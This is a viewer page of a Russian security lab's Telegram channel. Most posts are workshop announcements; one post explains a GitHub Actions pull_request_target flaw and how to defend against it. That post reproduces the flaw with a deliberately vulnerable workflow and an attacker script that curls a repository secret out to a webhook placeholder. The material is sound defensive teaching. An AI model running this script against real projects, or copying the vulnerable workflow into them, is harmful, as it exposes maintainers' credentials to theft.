TGViewer
Channel Public Channel
Консерва

Консерва

@dl_konserva

Здесь мы рассказываем про уязвимости, делимся опытом, полезными советами, материалами и новостями

Канал ведет команда Deiteriy Lab

lab.deiteriy.com
Subscribers
240
Photos
48
Videos
0
Links
28
Recent Posts 9 shown
Post #71 265
😎 Кейс нашего коллеги вошел в топ-10 Pentest Award!

В этом году мы подали несколько работ на Pentest Award, и одна из них - в категории Device - попала в шорт-лист, войдя в топ-10 работ в своей номинации

Часть этого кейса легла в основу доклада на OFFZONE 2025 - рекомендуем посмотреть запись, если пропустили
  • 🔥 10
  • 👾 3
  • ❤ 2
Post #63 315
🙂 Всем привет!

На прошлой неделе провели наш воркшоп по практической информационной безопасности - PRACTICAL SECURITY VILLAGE
В этом году он проходил в Нижнем Новгороде в рамках конференции #PAYMENTSECURITY

Немного перевели дух и подготовили врайтапы по самым популярным заданиям - их можно забрать по ссылке

Кроме того делимся фотографиями с воркшопа 📸

Были рады увидеться вживую, поделиться нашим опытом, послушать ваши истории и просто круто пообщаться!

Начинаем готовиться к следующему PSV 😎
  • 👾 8
  • 🔥 7
  • 😎 1
Post #62 303
Всем привет! 🙂

Вы просили - мы сделали!

Теперь билет на #PAYMENTSECURITY можно проапгрейдить и добавить к нему проходку на наш воркшоп Practical Security Village

Если вы уже взяли билет на конференцию, но не зарегистрировались на воркшоп - это все еще можно сделать на сайте

Количество мест ограничено!

До встречи на Practical Security Village! 😎
  • 🔥 5
  • 👾 2
Post #59 339
📣 Всем привет!

Продолжаем рассказывать о том, что вас ждет на Practical Security Village 😎

Одной из активностей будет воркшоп по пайке. Впервые задания с пайкой и железками мы сделали в прошлом году, и вы встретили их очень активно

В этом году мы разработали более сложное устройство - с большим количеством компонентов и более разнообразными заданиями

Звучит хардкорно, но пугаться не стоит: опыт в пайке для участия не потребуется. Брать с собой тоже ничего не нужно - все инструменты и компоненты выдадим на месте, а наша команда всегда будут рядом, чтобы подсказать и помочь

Собранное устройство сразу можно будет проверить в деле для выполнения заданий - а потом забрать с собой 📟

Успейте зарегистрироваться, количество мест ограничено!

До встречи на Practical Security Village! 👨🏻‍💻
  • 🔥 14
  • 👾 3
Post #58 845
📣 Всем привет!

До Practical Security Village осталось всего 2 недели!

Пока мы вовсю готовимся к воркшопу, делимся с вами частью закулисья - концепт-артами, которые легли в основу принтов для нашего традиционного, лимитированного мерча

Воркшоп пройдет 05-06 августа в Нижнем Новгороде в рамках конференции #PAYMENTSECURITY
Регистрация доступна на сайте

До встречи на Practical Security Village! 🚀
  • 🔥 3
  • 😎 3
  • ❤ 2
Post #57 662
📣 Всем привет!

Ровно 2 месяца осталось до Practical Security Village 2026!

Мы стараемся менять географию и радовать вас новыми городами и локациями - в этом году воркшоп пройдет в Нижнем Новгороде.

Как всегда вас ждут:
▪️ интересные задания разного уровня сложности на взлом мобильных и веб-приложений, инфраструктуры и AI
▪️ воркшоп по пайке - соберете собственный хакерский девайс и проверите его в деле на секции hardware
▪️ традиционные лимитированные футболки с нашими принтами
▪️ крутой мерч для самых активных участников
▪️ атмосферная музыка и живое общение с единомышленниками

Воркшоп пройдет 05-06 августа в рамках конференции #PAYMENTSECURITY

Регистрация доступна на сайте

Будем рады видеть вас на Practical Security Village! 💻
  • 🔥 12
  • ❤ 4
Post #56 414
Делимся нашей новой статьей на Хабре 👨🏻‍💻

Качественные вордлисты - ключ к эффективному фаззингу и большему покрытию скоупа во время пентеста.

Но вордлисты в общем доступе далеко не всегда дадут
достаточное покрытие, какими бы большими они ни были - у приложения
может быть свой специфический нейминг путей и параметров, а часть
эндпоинтов вовсе не найти без ручного анализа JS.

В первой статье цикла разбираем, как можно собрать базовый
кастомный вордлист с помощью Burp, Katana, ffuf, gau, xnLinkFinder и GAP.

Приятного чтения! 😋
  • 🔥 5
  • 👀 3
Post #49 355
Недавно в репозитории популярной GIS-системы QGIS нашли архитектурную уязвимость в пайплайнах GitHub Actions (CVE-2026-24480), позволившую получить доступ к секретам проекта.

🔍 В чем заключается уязвимость?

Разработчики использовали триггер ⁠pull_request_target в воркфлоу для автоматических проверок кода (⁠pre-commit checks).
Главное отличие этого триггера от обычного ⁠pull_request в том, что он запускается в контексте базового репозитория, то есть репозитория, в который вливают изменения.
Это значит, что пайплайн имеет доступ к ⁠GITHUB_TOKEN с правами на запись, а также к секретам, сконфигурированным в репозитории.
При этом внутри пайплайна происходил checkout кода из форка (который полностью контролирует атакующий) и его последующий запуск.


🧨 Для эксплуатации необходимо сочетание двух условий:

1. Использование триггера ⁠pull_request_target
2. Checkout и выполнение кода из внешнего PR

✨ Как можно воспроизвести уязвимость?

Посмотрим, как уязвимость работает на практике. Для демонстрации потребуется только два аккаунта на GitHub

1. В аккаунте "жертвы" создаём публичный репозиторий с секретом (⁠PROD_API_KEY) и уязвимым воркфлоу:
name: Pre-commit checks
on:
pull_request_target: # Опасный триггер

jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }} # Чекаут кода атакующего
- name: Run tests
env:
PROD_API_KEY: ${{ secrets.PROD_API_KEY }} # Секрет в окружении
run: bash run_tests.sh


С аккаунта "атакующего" делаем форк, подменяем ⁠run_tests.sh на свой, который отправляет PROD_API_KEY на webhook и делаем Pull Request

#!/bin/bash
curl -X POST -d "stolen_key=$PROD_API_KEY" https://webhook.site/YOUR_URL


🔥 Результат - воркфлоу запускается автоматически, выполняет наш код с секретами "жертвы".
GitHub маскирует токен звёздочками ⁠в логах, но на webhook отправляет в открытом виде.

🤺 Как защититься?

- Внутри ⁠pull_request_target никогда не делайте checkout и не выполняйте код из чужого PR
- Если этот триггер всё же нужен - используйте его только для работы с метаданными (например, навешивание лейблов на PR)
- Для задач, где необходимо собирать или тестировать код из PR, используйте обычный триггер ⁠pull_request - он запускается с read-only правами и без доступа к секретам

📌 Кстати, в феврале 2026 года бот hackerbot-claw массово сканировал популярные опенсорс-проекты на наличие именно этого паттерна.

Среди пострадавших - репозиторий awesome-go и ещё несколько крупных репозиториев, из которых были украдены токены 🦀
  • 👍 5
  • 🔥 2
  • 😱 2
Older posts →

About this channel

How can I read @dl_konserva without a Telegram account?
TGViewer shows the public web preview Telegram publishes for Консерва: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does Консерва have?
Консерва (@dl_konserva) has 240 subscribers on Telegram, refreshed roughly every 30 minutes.
Does Консерва know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →